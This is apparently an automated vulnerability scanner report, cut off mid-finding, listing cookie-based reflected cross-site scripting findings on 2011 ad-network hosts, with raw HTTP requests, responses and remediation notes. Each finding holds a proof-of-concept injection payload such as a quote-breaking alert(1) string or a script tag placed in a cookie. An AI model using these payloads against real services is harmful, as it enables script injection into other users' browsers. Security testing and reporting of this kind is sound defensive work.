Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=a9893"-alert(1)-"9508af4cd35; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses2=12590^1&13549^1; csi2=3200913.js^1^1304949680^1304949680&3196046.js^1^1304949680^1304949680; rdk=7856/12590; rdk15=0; ses15=13549^1&13264^1&12590^1; csi15=3173215.js^1^1304949690^1304949690&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:07:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:07:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1&13264^1&12590^2; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64374; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3196048.js^1^1304950025^1304950025&3173215.js^1^1304949690^1304949690&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; expires=Mon, 16-May-2011 14:07:05 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2215

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196048"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=a9893"-alert(1)-"9508af4cd35\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...
3.140. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba34e"-alert(1)-"c78825df4d5 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7856/12590/22893-2.js?cb=0.7725758128799498&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=ba34e"-alert(1)-"c78825df4d5; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses2=12590^1&13549^1; csi2=3200913.js^1^1304949680^1304949680&3196046.js^1^1304949680^1304949680; rdk=7856/12590; rdk15=0; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:01 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:07:01 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 15:07:01 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^2&13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64378; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3196046.js^2^1304949680^1304950021&3200913.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 14:07:01 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2214

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196046"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=ba34e"-alert(1)-"c78825df4d5\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...
3.141. http://optimized-by.rubiconproject.com/a/7858/13549/26630-15.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7858/13549/26630-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ffc0"-alert(1)-"2960e63a9b was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7858/13549/26630-15.js?cb=0.2465566643513739 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; csi9=3188005.js^1^1304340479^1304340479; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi15=3153732.js^1^1304367467^1304367467&3166422.js^1^1304366186^1304366186&3140642.js^2^1304363213^1304364698&3167237.js^2^1304361606^1304361617&3200915.js^1^1304360968^1304360968&3203914.js^3^1304360291^1304360963&3190993.js^3^1304358760^1304359002&3151969.js^2^1304340485^1304341092&3151966.js^2^1304340392^1304340510&3199969.js^1^1304340482^1304340482&3186719.js^2^1304340387^1304340476&3188306.js^1^1304340471^1304340471&3196947.js^1^1304340427^1304340427&3201778.js^1^1304340414^1304340414&3151650.js^3^1304340335^1304340359; ruid=2ffc0"-alert(1)-"2960e63a9b; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:26 GMT
Server: RAS/1.3 (Unix)
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: ruid=2ffc0"-alert(1)-"2960e63a9b^1^1304949686^2915161843; expires=Sun, 07-Aug-2011 14:01:26 GMT; max-age=7776000; path=/; domain=.rubiconproject.com;
Set-Cookie: rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; path=/; domain=.rubiconproject.com;
Set-Cookie: rdk=7858/13549; expires=Mon, 09-May-2011 15:01:26 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:01:26 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64713; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2114

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3152064"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=2ffc0"-alert(1)-"2960e63a9b\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...
3.142. http://optimized-by.rubiconproject.com/a/7858/13549/26630-2.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7858/13549/26630-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 422cd"-alert(1)-"e10ed0c79e was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7858/13549/26630-2.js?cb=0.004363113781437278 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=422cd"-alert(1)-"e10ed0c79e; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670; rdk9=0; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; rdk=7856/12590; rdk2=0; ses2=12590^1; csi2=3196046.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:04:49 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7858/13549; expires=Mon, 09-May-2011 15:04:49 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 15:04:49 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^1&13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64510; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3200913.js^1^1304949889^1304949889&3196046.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 14:04:49 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2030

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3200913"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=422cd"-alert(1)-"e10ed0c79e\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...
3.143. http://optimized-by.rubiconproject.com/a/7858/13549/26633-9.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7858/13549/26633-9.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cbb2"-alert(1)-"3197d9eb2d5 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7858/13549/26633-9.js?cb=0.8043483311776072 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; csi9=3188005.js^1^1304340479^1304340479; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=6cbb2"-alert(1)-"3197d9eb2d5; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=7858/13549; rdk15=0; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:20 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7858/13549; expires=Mon, 09-May-2011 15:03:20 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk9=0; expires=Mon, 09-May-2011 15:03:20 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses9=13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64599; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi9=3200914.js^1^1304949800^1304949800; expires=Mon, 16-May-2011 14:03:20 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2034

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3200914"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=6cbb2"-alert(1)-"3197d9eb2d5\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...
3.144. http://optimized-by.rubiconproject.com/a/8201/13264/25249-15.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/8201/13264/25249-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96365"-alert(1)-"6dd04684091 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/8201/13264/25249-15.js?cb=0.48162996326573193 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=96365"-alert(1)-"6dd04684091; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk15=0; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670; rdk=7858/13549; rdk9=0; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:04:50 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=8201/13264; expires=Mon, 09-May-2011 15:04:50 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:04:50 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1&13264^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64509; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2456

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3163599"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=96365"-alert(1)-"6dd04684091\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...
3.145. http://seg.sharethis.com/getSegment.php [__stid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload ab408<script>alert(1)</script>3b5c5e16745 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&jsref=&rnd=1304949611184 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==ab408<script>alert(1)</script>3b5c5e16745; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Mon, 09 May 2011 14:00:21 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspT702sdV9LL0aNgCmJAg==ab408<script>alert(1)</script>3b5c5e16745
userid:
</div>
...[SNIP]...
3.146. http://tag.contextweb.com/TagPublish/getad.aspx [V cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getad.aspx

Issue detail

The value of the V cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d57c'-alert(1)-'4e697206eb9 was submitted in the V cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=536156&ct=101378&cf=728X90&cn=1&rq=1&dw=1066&cwu=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&mrnd=74482871&if=0&tl=1&pxy=0,0&cxy=1050,3575&dxy=1050,3575&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
